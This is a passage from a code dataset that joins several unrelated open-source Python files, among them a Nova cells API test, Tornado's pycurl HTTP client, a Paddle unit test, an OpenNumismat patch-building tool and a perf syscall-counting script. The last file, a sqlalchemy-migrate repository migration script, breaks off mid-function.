# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from six.moves import range
from nova.cells import rpcapi as cells_rpcapi
from nova.cells import state
from nova import db
from nova.db.sqlalchemy import models
from nova import exception
from nova.tests.functional.api_sample_tests import api_sample_base
CONF = cfg.CONF
CONF.import_opt('osapi_compute_extension',
'nova.api.openstack.compute.legacy_v2.extensions')
class CellsSampleJsonTest(api_sample_base.ApiSampleTestBaseV21):
extension_name = "os-cells"
def _get_flags(self):
f = super(CellsSampleJsonTest, self)._get_flags()
f['osapi_compute_extension'] = CONF.osapi_compute_extension[:]
f['osapi_compute_extension'].append(
'nova.api.openstack.compute.contrib.cells.Cells')
f['osapi_compute_extension'].append('nova.api.openstack.compute.'
'contrib.cell_capacities.Cell_capacities')
return f
def setUp(self):
# db_check_interval < 0 makes cells manager always hit the DB
self.flags(enable=True, db_check_interval=-1, group='cells')
super(CellsSampleJsonTest, self).setUp()
self._stub_cells()
def _stub_cells(self, num_cells=5):
self.cell_list = []
self.cells_next_id = 1
def _fake_cell_get_all(context):
return self.cell_list
def _fake_cell_get(inst, context, cell_name):
for cell in self.cell_list:
if cell['name'] == cell_name:
return cell
raise exception.CellNotFound(cell_name=cell_name)
for x in range(num_cells):
cell = models.Cell()
our_id = self.cells_next_id
self.cells_next_id += 1
cell.update({'id': our_id,
'name': 'cell%s' % our_id,
'transport_url': 'rabbit://username%s@/' % our_id,
'is_parent': our_id % 2 == 0})
self.cell_list.append(cell)
self.stubs.Set(db, 'cell_get_all', _fake_cell_get_all)
self.stubs.Set(cells_rpcapi.CellsAPI, 'cell_get', _fake_cell_get)
def test_cells_empty_list(self):
# Override this
self._stub_cells(num_cells=0)
response = self._do_get('os-cells')
subs = self._get_regexes()
self._verify_response('cells-list-empty-resp', subs, response, 200)
def test_cells_list(self):
response = self._do_get('os-cells')
subs = self._get_regexes()
self._verify_response('cells-list-resp', subs, response, 200)
def test_cells_get(self):
response = self._do_get('os-cells/cell3')
subs = self._get_regexes()
self._verify_response('cells-get-resp', subs, response, 200)
def test_get_cell_capacity(self):
self._mock_cell_capacity()
state_manager = state.CellStateManager()
my_state = state_manager.get_my_state()
response = self._do_get('os-cells/%s/capacities' %
my_state.name)
subs = self._get_regexes()
return self._verify_response('cells-capacities-resp',
subs, response, 200)
def test_get_all_cells_capacity(self):
self._mock_cell_capacity()
response = self._do_get('os-cells/capacities')
subs = self._get_regexes()
return self._verify_response('cells-capacities-resp',
subs, response, 200)
def _mock_cell_capacity(self):
self.mox.StubOutWithMock(self.cells.manager.state_manager,
'get_our_capacities')
response = {"ram_free":
{"units_by_mb": {"8192": 0, "512": 13,
"4096": 1, "2048": 3, "16384": 0},
"total_mb": 7680},
"disk_free":
{"units_by_mb": {"81920": 11, "20480": 46,
"40960": 23, "163840": 5, "0": 0},
"total_mb": 1052672}
}
self.cells.manager.state_manager.get_our_capacities(). \
AndReturn(response)
self.mox.ReplayAll()
|
jiangzhonghui/viewfinder
|
refs/heads/master
|
marketing/tornado/curl_httpclient.py
|
37
|
#!/usr/bin/env python
#
# Copyright 2009 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Non-blocking HTTP client implementation using pycurl."""
from __future__ import absolute_import, division, print_function, with_statement
import collections
import logging
import pycurl
import threading
import time
from tornado import httputil
from tornado import ioloop
from tornado.log import gen_log
from tornado import stack_context
from tornado.escape import utf8, native_str
from tornado.httpclient import HTTPResponse, HTTPError, AsyncHTTPClient, main
from tornado.util import bytes_type
try:
from io import BytesIO # py3
except ImportError:
from cStringIO import StringIO as BytesIO # py2
class CurlAsyncHTTPClient(AsyncHTTPClient):
def initialize(self, io_loop, max_clients=10, defaults=None):
super(CurlAsyncHTTPClient, self).initialize(io_loop, defaults=defaults)
self._multi = pycurl.CurlMulti()
self._multi.setopt(pycurl.M_TIMERFUNCTION, self._set_timeout)
self._multi.setopt(pycurl.M_SOCKETFUNCTION, self._handle_socket)
self._curls = [_curl_create() for i in range(max_clients)]
self._free_list = self._curls[:]
self._requests = collections.deque()
self._fds = {}
self._timeout = None
try:
self._socket_action = self._multi.socket_action
except AttributeError:
# socket_action is found in pycurl since 7.18.2 (it's been
# in libcurl longer than that but wasn't accessible to
# python).
gen_log.warning("socket_action method missing from pycurl; "
"falling back to socket_all. Upgrading "
"libcurl and pycurl will improve performance")
self._socket_action = \
lambda fd, action: self._multi.socket_all()
# libcurl has bugs that sometimes cause it to not report all
# relevant file descriptors and timeouts to TIMERFUNCTION/
# SOCKETFUNCTION. Mitigate the effects of such bugs by
# forcing a periodic scan of all active requests.
self._force_timeout_callback = ioloop.PeriodicCallback(
self._handle_force_timeout, 1000, io_loop=io_loop)
self._force_timeout_callback.start()
# Work around a bug in libcurl 7.29.0: Some fields in the curl
# multi object are initialized lazily, and its destructor will
# segfault if it is destroyed without having been used. Add
# and remove a dummy handle to make sure everything is
# initialized.
dummy_curl_handle = pycurl.Curl()
self._multi.add_handle(dummy_curl_handle)
self._multi.remove_handle(dummy_curl_handle)
def close(self):
self._force_timeout_callback.stop()
if self._timeout is not None:
self.io_loop.remove_timeout(self._timeout)
for curl in self._curls:
curl.close()
self._multi.close()
self._closed = True
super(CurlAsyncHTTPClient, self).close()
def fetch_impl(self, request, callback):
self._requests.append((request, callback))
self._process_queue()
self._set_timeout(0)
def _handle_socket(self, event, fd, multi, data):
"""Called by libcurl when it wants to change the file descriptors
it cares about.
"""
event_map = {
pycurl.POLL_NONE: ioloop.IOLoop.NONE,
pycurl.POLL_IN: ioloop.IOLoop.READ,
pycurl.POLL_OUT: ioloop.IOLoop.WRITE,
pycurl.POLL_INOUT: ioloop.IOLoop.READ | ioloop.IOLoop.WRITE
}
if event == pycurl.POLL_REMOVE:
if fd in self._fds:
self.io_loop.remove_handler(fd)
del self._fds[fd]
else:
ioloop_event = event_map[event]
# libcurl sometimes closes a socket and then opens a new
# one using the same FD without giving us a POLL_NONE in
# between. This is a problem with the epoll IOLoop,
# because the kernel can tell when a socket is closed and
# removes it from the epoll automatically, causing future
# update_handler calls to fail. Since we can't tell when
# this has happened, always use remove and re-add
# instead of update.
if fd in self._fds:
self.io_loop.remove_handler(fd)
self.io_loop.add_handler(fd, self._handle_events,
ioloop_event)
self._fds[fd] = ioloop_event
def _set_timeout(self, msecs):
"""Called by libcurl to schedule a timeout."""
if self._timeout is not None:
self.io_loop.remove_timeout(self._timeout)
self._timeout = self.io_loop.add_timeout(
self.io_loop.time() + msecs / 1000.0, self._handle_timeout)
def _handle_events(self, fd, events):
"""Called by IOLoop when there is activity on one of our
file descriptors.
"""
action = 0
if events & ioloop.IOLoop.READ:
action |= pycurl.CSELECT_IN
if events & ioloop.IOLoop.WRITE:
action |= pycurl.CSELECT_OUT
while True:
try:
ret, num_handles = self._socket_action(fd, action)
except pycurl.error as e:
ret = e.args[0]
if ret != pycurl.E_CALL_MULTI_PERFORM:
break
self._finish_pending_requests()
def _handle_timeout(self):
"""Called by IOLoop when the requested timeout has passed."""
with stack_context.NullContext():
self._timeout = None
while True:
try:
ret, num_handles = self._socket_action(
pycurl.SOCKET_TIMEOUT, 0)
except pycurl.error as e:
ret = e.args[0]
if ret != pycurl.E_CALL_MULTI_PERFORM:
break
self._finish_pending_requests()
# In theory, we shouldn't have to do this because curl will
# call _set_timeout whenever the timeout changes. However,
# sometimes after _handle_timeout we will need to reschedule
# immediately even though nothing has changed from curl's
# perspective. This is because when socket_action is
# called with SOCKET_TIMEOUT, libcurl decides internally which
# timeouts need to be processed by using a monotonic clock
# (where available) while tornado uses python's time.time()
# to decide when timeouts have occurred. When those clocks
# disagree on elapsed time (as they will whenever there is an
# NTP adjustment), tornado might call _handle_timeout before
# libcurl is ready. After each timeout, resync the scheduled
# timeout with libcurl's current state.
new_timeout = self._multi.timeout()
if new_timeout >= 0:
self._set_timeout(new_timeout)
def _handle_force_timeout(self):
"""Called by IOLoop periodically to ask libcurl to process any
events it may have forgotten about.
"""
with stack_context.NullContext():
while True:
try:
ret, num_handles = self._multi.socket_all()
except pycurl.error as e:
ret = e.args[0]
if ret != pycurl.E_CALL_MULTI_PERFORM:
break
self._finish_pending_requests()
def _finish_pending_requests(self):
"""Process any requests that were completed by the last
call to multi.socket_action.
"""
while True:
num_q, ok_list, err_list = self._multi.info_read()
for curl in ok_list:
self._finish(curl)
for curl, errnum, errmsg in err_list:
self._finish(curl, errnum, errmsg)
if num_q == 0:
break
self._process_queue()
def _process_queue(self):
with stack_context.NullContext():
while True:
started = 0
while self._free_list and self._requests:
started += 1
curl = self._free_list.pop()
(request, callback) = self._requests.popleft()
curl.info = {
"headers": httputil.HTTPHeaders(),
"buffer": BytesIO(),
"request": request,
"callback": callback,
"curl_start_time": time.time(),
}
# Disable IPv6 to mitigate the effects of this bug
# on curl versions <= 7.21.0
# http://sourceforge.net/tracker/?func=detail&aid=3017819&group_id=976&atid=100976
if pycurl.version_info()[2] <= 0x71500: # 7.21.0
curl.setopt(pycurl.IPRESOLVE, pycurl.IPRESOLVE_V4)
_curl_setup_request(curl, request, curl.info["buffer"],
curl.info["headers"])
self._multi.add_handle(curl)
if not started:
break
def _finish(self, curl, curl_error=None, curl_message=None):
info = curl.info
curl.info = None
self._multi.remove_handle(curl)
self._free_list.append(curl)
buffer = info["buffer"]
if curl_error:
error = CurlError(curl_error, curl_message)
code = error.code
effective_url = None
buffer.close()
buffer = None
else:
error = None
code = curl.getinfo(pycurl.HTTP_CODE)
effective_url = curl.getinfo(pycurl.EFFECTIVE_URL)
buffer.seek(0)
# the various curl timings are documented at
# http://curl.haxx.se/libcurl/c/curl_easy_getinfo.html
time_info = dict(
queue=info["curl_start_time"] - info["request"].start_time,
namelookup=curl.getinfo(pycurl.NAMELOOKUP_TIME),
connect=curl.getinfo(pycurl.CONNECT_TIME),
pretransfer=curl.getinfo(pycurl.PRETRANSFER_TIME),
starttransfer=curl.getinfo(pycurl.STARTTRANSFER_TIME),
total=curl.getinfo(pycurl.TOTAL_TIME),
redirect=curl.getinfo(pycurl.REDIRECT_TIME),
)
try:
info["callback"](HTTPResponse(
request=info["request"], code=code, headers=info["headers"],
buffer=buffer, effective_url=effective_url, error=error,
request_time=time.time() - info["curl_start_time"],
time_info=time_info))
except Exception:
self.handle_callback_exception(info["callback"])
def handle_callback_exception(self, callback):
self.io_loop.handle_callback_exception(callback)
class CurlError(HTTPError):
def __init__(self, errno, message):
HTTPError.__init__(self, 599, message)
self.errno = errno
def _curl_create():
curl = pycurl.Curl()
if gen_log.isEnabledFor(logging.DEBUG):
curl.setopt(pycurl.VERBOSE, 1)
curl.setopt(pycurl.DEBUGFUNCTION, _curl_debug)
return curl
def _curl_setup_request(curl, request, buffer, headers):
curl.setopt(pycurl.URL, native_str(request.url))
# libcurl's magic "Expect: 100-continue" behavior causes delays
# with servers that don't support it (which include, among others,
# Google's OpenID endpoint). Additionally, this behavior has
# a bug in conjunction with the curl_multi_socket_action API
# (https://sourceforge.net/tracker/?func=detail&atid=100976&aid=3039744&group_id=976),
# which increases the delays. It's more trouble than it's worth,
# so just turn off the feature (yes, setting Expect: to an empty
# value is the official way to disable this)
if "Expect" not in request.headers:
request.headers["Expect"] = ""
# libcurl adds Pragma: no-cache by default; disable that too
if "Pragma" not in request.headers:
request.headers["Pragma"] = ""
# Request headers may be either a regular dict or HTTPHeaders object
if isinstance(request.headers, httputil.HTTPHeaders):
curl.setopt(pycurl.HTTPHEADER,
[native_str("%s: %s" % i) for i in request.headers.get_all()])
else:
curl.setopt(pycurl.HTTPHEADER,
[native_str("%s: %s" % i) for i in request.headers.items()])
if request.header_callback:
curl.setopt(pycurl.HEADERFUNCTION, request.header_callback)
else:
curl.setopt(pycurl.HEADERFUNCTION,
lambda line: _curl_header_callback(headers, line))
if request.streaming_callback:
write_function = request.streaming_callback
else:
write_function = buffer.write
if bytes_type is str: # py2
curl.setopt(pycurl.WRITEFUNCTION, write_function)
else: # py3
# Upstream pycurl doesn't support py3, but ubuntu 12.10 includes
# a fork/port. That version has a bug in which it passes unicode
# strings instead of bytes to the WRITEFUNCTION. This means that
# if you use a WRITEFUNCTION (which tornado always does), you cannot
# download arbitrary binary data. This needs to be fixed in the
# ported pycurl package, but in the meantime this lambda will
# make it work for downloading (utf8) text.
curl.setopt(pycurl.WRITEFUNCTION, lambda s: write_function(utf8(s)))
curl.setopt(pycurl.FOLLOWLOCATION, request.follow_redirects)
curl.setopt(pycurl.MAXREDIRS, request.max_redirects)
curl.setopt(pycurl.CONNECTTIMEOUT_MS, int(1000 * request.connect_timeout))
curl.setopt(pycurl.TIMEOUT_MS, int(1000 * request.request_timeout))
if request.user_agent:
curl.setopt(pycurl.USERAGENT, native_str(request.user_agent))
else:
curl.setopt(pycurl.USERAGENT, "Mozilla/5.0 (compatible; pycurl)")
if request.network_interface:
curl.setopt(pycurl.INTERFACE, request.network_interface)
if request.use_gzip:
curl.setopt(pycurl.ENCODING, "gzip,deflate")
else:
curl.setopt(pycurl.ENCODING, "none")
if request.proxy_host and request.proxy_port:
curl.setopt(pycurl.PROXY, request.proxy_host)
curl.setopt(pycurl.PROXYPORT, request.proxy_port)
if request.proxy_username:
credentials = '%s:%s' % (request.proxy_username,
request.proxy_password)
curl.setopt(pycurl.PROXYUSERPWD, credentials)
else:
curl.setopt(pycurl.PROXY, '')
if request.validate_cert:
curl.setopt(pycurl.SSL_VERIFYPEER, 1)
curl.setopt(pycurl.SSL_VERIFYHOST, 2)
else:
curl.setopt(pycurl.SSL_VERIFYPEER, 0)
curl.setopt(pycurl.SSL_VERIFYHOST, 0)
if request.ca_certs is not None:
curl.setopt(pycurl.CAINFO, request.ca_certs)
else:
# There is no way to restore pycurl.CAINFO to its default value
# (Using unsetopt makes it reject all certificates).
# I don't see any way to read the default value from python so it
# can be restored later. We'll have to just leave CAINFO untouched
# if no ca_certs file was specified, and require that if any
# request uses a custom ca_certs file, they all must.
pass
if request.allow_ipv6 is False:
# Curl behaves reasonably when DNS resolution gives an ipv6 address
# that we can't reach, so allow ipv6 unless the user asks to disable.
# (but see version check in _process_queue above)
curl.setopt(pycurl.IPRESOLVE, pycurl.IPRESOLVE_V4)
# Set the request method through curl's irritating interface which makes
# up names for almost every single method
curl_options = {
"GET": pycurl.HTTPGET,
"POST": pycurl.POST,
"PUT": pycurl.UPLOAD,
"HEAD": pycurl.NOBODY,
}
custom_methods = set(["DELETE", "OPTIONS", "PATCH"])
for o in curl_options.values():
curl.setopt(o, False)
if request.method in curl_options:
curl.unsetopt(pycurl.CUSTOMREQUEST)
curl.setopt(curl_options[request.method], True)
elif request.allow_nonstandard_methods or request.method in custom_methods:
curl.setopt(pycurl.CUSTOMREQUEST, request.method)
else:
raise KeyError('unknown method ' + request.method)
# Handle curl's cryptic options for every individual HTTP method
if request.method in ("POST", "PUT"):
request_buffer = BytesIO(utf8(request.body))
curl.setopt(pycurl.READFUNCTION, request_buffer.read)
if request.method == "POST":
def ioctl(cmd):
if cmd == curl.IOCMD_RESTARTREAD:
request_buffer.seek(0)
curl.setopt(pycurl.IOCTLFUNCTION, ioctl)
curl.setopt(pycurl.POSTFIELDSIZE, len(request.body))
else:
curl.setopt(pycurl.INFILESIZE, len(request.body))
if request.auth_username is not None:
userpwd = "%s:%s" % (request.auth_username, request.auth_password or '')
if request.auth_mode is None or request.auth_mode == "basic":
curl.setopt(pycurl.HTTPAUTH, pycurl.HTTPAUTH_BASIC)
elif request.auth_mode == "digest":
curl.setopt(pycurl.HTTPAUTH, pycurl.HTTPAUTH_DIGEST)
else:
raise ValueError("Unsupported auth_mode %s" % request.auth_mode)
curl.setopt(pycurl.USERPWD, native_str(userpwd))
gen_log.debug("%s %s (username: %r)", request.method, request.url,
request.auth_username)
else:
curl.unsetopt(pycurl.USERPWD)
gen_log.debug("%s %s", request.method, request.url)
if request.client_cert is not None:
curl.setopt(pycurl.SSLCERT, request.client_cert)
if request.client_key is not None:
curl.setopt(pycurl.SSLKEY, request.client_key)
if threading.activeCount() > 1:
# libcurl/pycurl is not thread-safe by default. When multiple threads
# are used, signals should be disabled. This has the side effect
# of disabling DNS timeouts in some environments (when libcurl is
# not linked against ares), so we don't do it when there is only one
# thread. Applications that use many short-lived threads may need
# to set NOSIGNAL manually in a prepare_curl_callback since
# there may not be any other threads running at the time we call
# threading.activeCount.
curl.setopt(pycurl.NOSIGNAL, 1)
if request.prepare_curl_callback is not None:
request.prepare_curl_callback(curl)
def _curl_header_callback(headers, header_line):
# header_line as returned by curl includes the end-of-line characters.
header_line = header_line.strip()
if header_line.startswith("HTTP/"):
headers.clear()
return
if not header_line:
return
headers.parse_line(header_line)
def _curl_debug(debug_type, debug_msg):
debug_types = ('I', '<', '>', '<', '>')
if debug_type == 0:
gen_log.debug('%s', debug_msg.strip())
elif debug_type in (1, 2):
for line in debug_msg.splitlines():
gen_log.debug('%s %s', debug_types[debug_type], line)
elif debug_type == 4:
gen_log.debug('%s %r', debug_types[debug_type], debug_msg)
if __name__ == "__main__":
AsyncHTTPClient.configure(CurlAsyncHTTPClient)
main()
|
chengduoZH/Paddle
|
refs/heads/develop
|
python/paddle/fluid/tests/unittests/test_save_model_without_var.py
|
2
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import warnings
import unittest
import paddle
import paddle.fluid as fluid
from paddle.fluid.layers.device import get_places
from paddle.fluid.executor import as_numpy
class TestSaveModelWithoutVar(unittest.TestCase):
def test_no_var_save(self):
data = fluid.layers.data(
name='data',
shape=[-1, 1],
dtype='float32',
append_batch_size=False)
data_plus = data + 1
if fluid.core.is_compiled_with_cuda():
place = fluid.core.CUDAPlace(0)
else:
place = fluid.core.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
fluid.io.save_inference_model(
dirname='test',
feeded_var_names=['data'],
target_vars=[data_plus],
executor=exe,
model_filename='model',
params_filename='params')
expected_warn = "no variable in your model, please ensure there are any variables in your model to save"
self.assertTrue(len(w) > 0)
self.assertTrue(expected_warn == str(w[0].message))
if __name__ == '__main__':
unittest.main()
|
jackrzhang/zulip
|
refs/heads/master
|
zilencer/forms.py
|
70
|
from django import forms
class EnterpriseToSForm(forms.Form):
full_name = forms.CharField(max_length=100)
company = forms.CharField(max_length=100)
terms = forms.BooleanField(required=True)
|
OpenNumismat/open-numismat
|
refs/heads/master
|
tools/make_patch.py
|
1
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import codecs
import json
import os
import sys
from PyQt5 import QtCore
from PyQt5.QtCore import QStandardPaths, Qt, QDateTime
from PyQt5.QtGui import QImage
from PyQt5.QtSql import QSqlTableModel, QSqlDatabase, QSqlQuery
from PyQt5.QtWidgets import QApplication, QFileDialog
from OpenNumismat.Collection.CollectionFields import FieldTypes as Type
sys.path.append('..')
from OpenNumismat.Collection.CollectionFields import CollectionFieldsBase
PATCH = [
{'action': 'add'},
{'action': 'add'},
{'action': 'add'},
{'action': 'add'},
]
SKIPPED_FIELDS = ('edgeimg', 'photo1', 'photo2', 'photo3', 'photo4',
'obversedesigner', 'reversedesigner', 'catalognum2', 'catalognum3', 'catalognum4',
'saledate', 'saleprice', 'totalsaleprice', 'buyer', 'saleplace', 'saleinfo',
'paydate', 'payprice', 'totalpayprice', 'saller', 'payplace', 'payinfo',
'url', 'obversedesigner', 'reversedesigner', 'barcode', 'quantity',
'features', 'storage', 'defect', 'note', 'status', 'createdat')
app = QApplication(sys.argv)
HOME_PATH = ''
__docDirs = QStandardPaths.standardLocations(QStandardPaths.DocumentsLocation)
if __docDirs:
HOME_PATH = os.path.join(__docDirs[0], "OpenNumismat")
# Getting path where stored application data (icons, templates, etc)
PRJ_PATH = os.path.abspath(os.path.join(
os.path.dirname(__file__), "..", "OpenNumismat"))
json_file_name, _selectedFilter = QFileDialog.getOpenFileName(None,
"Open collection", HOME_PATH,
"Collections (*.json)")
if json_file_name:
image_path = json_file_name.replace('.json', '_images')
json_file = codecs.open(json_file_name, "r", "utf-8")
data = json.load(json_file)
is_obverse_enabled = False
is_reverse_enabled = True
for density in ('MDPI', 'HDPI', 'XHDPI', 'XXHDPI', 'XXXHDPI'):
print(density, "started")
db = QSqlDatabase.addDatabase('QSQLITE', 'patch_' + density.lower())
file_name = json_file_name.replace('.json', '_patch_' + density.lower() + '.db')
db.setDatabaseName(file_name)
if not db.open():
print(db.lastError().text())
print("Can't open collection")
exit()
mobile_settings = {'Version': 1, 'Type': 'Patch'}
sql = """CREATE TABLE settings (
title CHAR NOT NULL UNIQUE,
value CHAR)"""
QSqlQuery(sql, db)
for key, value in mobile_settings.items():
query = QSqlQuery(db)
query.prepare("""INSERT INTO settings (title, value)
VALUES (?, ?)""")
query.addBindValue(key)
query.addBindValue(str(value))
query.exec_()
sql = """CREATE TABLE patches (
id INTEGER PRIMARY KEY,
action CHAR,
src_id INTEGER,
dst_id INTEGER)"""
QSqlQuery(sql, db)
sql = """CREATE TABLE photos (
id INTEGER PRIMARY KEY,
image BLOB)"""
QSqlQuery(sql, db)
sqlFields = []
fields = CollectionFieldsBase()
for field in fields:
if field.name == 'id':
sqlFields.append('id INTEGER PRIMARY KEY')
elif field.name == 'image':
sqlFields.append('image INTEGER')
elif field.name in SKIPPED_FIELDS:
continue
else:
sqlFields.append("%s %s" % (field.name, Type.toSql(field.type)))
sql = "CREATE TABLE coins (" + ", ".join(sqlFields) + ")"
QSqlQuery(sql, db)
dest_model = QSqlTableModel(None, db)
dest_model.setEditStrategy(QSqlTableModel.OnManualSubmit)
dest_model.setTable('coins')
dest_model.select()
height = 64
if density == 'HDPI':
height *= 1.5
elif density == 'XHDPI':
height *= 2
elif density == 'XXHDPI':
height *= 3
elif density == 'XXXHDPI':
height *= 4
coin_id = 0
for coin_data in data['coins']:
action = coin_data['action']
coin = dest_model.record()
for field in fields:
if field.name in ('id', 'image', 'obverseimg', 'reverseimg'):
continue
if field.name in SKIPPED_FIELDS:
continue
if field.name == 'updatedat':
currentTime = QDateTime.currentDateTimeUtc()
coin.setValue('updatedat', currentTime.toString(Qt.ISODate))
continue
if field.name in coin_data:
coin.setValue(field.name, coin_data[field.name])
image = QImage()
for field_name in ('obverseimg', 'reverseimg'):
if field_name in coin_data:
img_file_name = os.path.join(image_path, coin_data[field_name])
img_file = open(img_file_name, 'rb')
img_data = img_file.read()
img_file.close()
query = QSqlQuery(db)
query.prepare("""INSERT INTO photos (image)
VALUES (?)""")
ba = QtCore.QByteArray(img_data)
query.addBindValue(ba)
query.exec_()
img_id = query.lastInsertId()
coin.setValue(field_name, img_id)
if (field_name == 'obverseimg' and is_obverse_enabled) or \
(field_name == 'reverseimg' and is_reverse_enabled):
image.loadFromData(img_data)
image = image.scaledToHeight(height,
Qt.SmoothTransformation)
if not image.isNull():
ba = QtCore.QByteArray()
buffer = QtCore.QBuffer(ba)
buffer.open(QtCore.QIODevice.WriteOnly)
# Store as PNG for better view
image.save(buffer, 'png')
coin.setValue('image', ba)
if action == 'update_desc':
dest_model.insertRecord(-1, coin)
coin_id += 1
for i in range(coin.count()):
if coin.fieldName(i) not in ('id', 'title', 'subjectshort', 'series', 'obversevar'):
coin.setNull(i)
dest_model.insertRecord(-1, coin)
coin_id += 1
elif action == 'update_img':
for i in range(coin.count()):
if coin.fieldName(i) not in ('id', 'title', 'subjectshort', 'series', 'obversevar',
'image', 'obverseimg', 'reverseimg'):
coin.setNull(i)
dest_model.insertRecord(-1, coin)
coin_id += 1
elif action == 'add':
dest_model.insertRecord(-1, coin)
coin_id += 1
elif action == 'delete':
for i in range(coin.count()):
if coin.fieldName(i) not in ('id', 'title', 'subjectshort', 'series', 'obversevar'):
coin.setNull(i)
dest_model.insertRecord(-1, coin)
coin_id += 1
if action in ('add', 'update_img'):
query = QSqlQuery(db)
query.prepare("""INSERT INTO patches (action, src_id)
VALUES (?, ?)""")
query.addBindValue(action)
query.addBindValue(coin_id)
query.exec_()
else:
query = QSqlQuery(db)
query.prepare("""INSERT INTO patches (action, src_id, dst_id)
VALUES (?, ?, ?)""")
query.addBindValue(action)
query.addBindValue(coin_id)
query.addBindValue(coin_id - 1)
query.exec_()
dest_model.submitAll()
db.close()
print(density, "done")
print("Processed %d coins" % dest_model.rowCount())
|
LearnEra/LearnEraPlaftform
|
refs/heads/master
|
lms/djangoapps/django_comment_client/settings.py
|
271
|
from django.conf import settings
MAX_COMMENT_DEPTH = None
MAX_UPLOAD_FILE_SIZE = 1024 * 1024 # result in bytes
ALLOWED_UPLOAD_FILE_TYPES = ('.jpg', '.jpeg', '.gif', '.bmp', '.png', '.tiff')
if hasattr(settings, 'DISCUSSION_SETTINGS'):
MAX_COMMENT_DEPTH = settings.DISCUSSION_SETTINGS.get('MAX_COMMENT_DEPTH')
MAX_UPLOAD_FILE_SIZE = settings.DISCUSSION_SETTINGS.get('MAX_UPLOAD_FILE_SIZE') or MAX_UPLOAD_FILE_SIZE
ALLOWED_UPLOAD_FILE_TYPES = settings.DISCUSSION_SETTINGS.get('ALLOWED_UPLOAD_FILE_TYPES') or ALLOWED_UPLOAD_FILE_TYPES
|
mikshepard/android_kernel_samsung_klte
|
refs/heads/cm-12.1
|
tools/perf/scripts/python/sctop.py
|
11180
|
# system call top
# (c) 2010, Tom Zanussi <tzanussi@gmail.com>
# Licensed under the terms of the GNU GPL License version 2
#
# Periodically displays system-wide system call totals, broken down by
# syscall. If a [comm] arg is specified, only syscalls called by
# [comm] are displayed. If an [interval] arg is specified, the display
# will be refreshed every [interval] seconds. The default interval is
# 3 seconds.
import os, sys, thread, time
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import *
usage = "perf script -s sctop.py [comm] [interval]\n";
for_comm = None
default_interval = 3
interval = default_interval
if len(sys.argv) > 3:
sys.exit(usage)
if len(sys.argv) > 2:
for_comm = sys.argv[1]
interval = int(sys.argv[2])
elif len(sys.argv) > 1:
try:
interval = int(sys.argv[1])
except ValueError:
for_comm = sys.argv[1]
interval = default_interval
syscalls = autodict()
def trace_begin():
thread.start_new_thread(print_syscall_totals, (interval,))
pass
def raw_syscalls__sys_enter(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, args):
if for_comm is not None:
if common_comm != for_comm:
return
try:
syscalls[id] += 1
except TypeError:
syscalls[id] = 1
def print_syscall_totals(interval):
while 1:
clear_term()
if for_comm is not None:
print "\nsyscall events for %s:\n\n" % (for_comm),
else:
print "\nsyscall events:\n\n",
print "%-40s %10s\n" % ("event", "count"),
print "%-40s %10s\n" % ("----------------------------------------", \
"----------"),
for id, val in sorted(syscalls.iteritems(), key = lambda(k, v): (v, k), \
reverse = True):
try:
print "%-40s %10d\n" % (syscall_name(id), val),
except TypeError:
pass
syscalls.clear()
time.sleep(interval)
|
tanayseven/Voix
|
refs/heads/master
|
flask/lib/python2.7/site-packages/migrate/versioning/migrate_repository.py
|
120
|
"""
Script to migrate repository from sqlalchemy <= 0.4.4 to the new
repository schema. This shouldn't use any other migrate modules, so
that it can work in any version.
"""
import os
import sys
import logging
log = logging.getLogger(__name__)
def usage():
"""Gives usage information."""
print """Usage: %(prog)s repository-to-migrate
Upgrade your repository to the new flat format.
NOTE: You should probably make a backup before running this.
""" % {'prog': sys.argv[0]}
sys.exit(1)
def delete_file(filepath):
"""Deletes a file and prints a message."""
log.info('Deleting file: %s' % filepath)
os.remove(filepath)
def move_file(src, tgt):
"""Moves a file and prints a message."""
log.info('Moving file %s to %s' % (src, tgt))
if os.path.exists(tgt):
raise Exception(
'Cannot move file %s because target %s already exists' % \
(src, tgt))
os.rename(src, tgt)
def delete_directory(dirpath):
"""Delete a directory and print a message."""
log.info('Deleting directory: %s' % dirpath)
os.rmdir(dirpath)
def migrate_repository(repos):
"""Does the actual migration to the new repository format."""
log.info('Migrating repository at: %s to new format' % repos)
versions = '%s/versions' % repos
dirs = os.listdir(versions)
# Only use int's in list.
numdirs = [int(dirname) for dirname in dirs if dirname.isdigit()]
numdirs.sort() # Sort list.
for dirname in numdirs:
origdir = '%s/%s' % (versions, dirname)
log.info('Working on directory: %s' % origdir)
files = os.listdir(origdir)
files.sort()
for filename in files:
# Delete compiled Python files.
if filename.endswith('.pyc') or filename.endswith('.pyo'):
delete_file('%s/%s' % (origdir, filename))
# Delete empty __init__.py files.
origfile = '%s/__init__.py' % origdir
if os.path.exists(origfile) and len(open(origfile).read()) == 0:
delete_file(origfile)
# Move sql upgrade scripts.
if filename.endswith('.sql'):
version, dbms, operation = filename.split('.', 3)[0:3]
origfile = '%s/%s' % (origdir, filename)
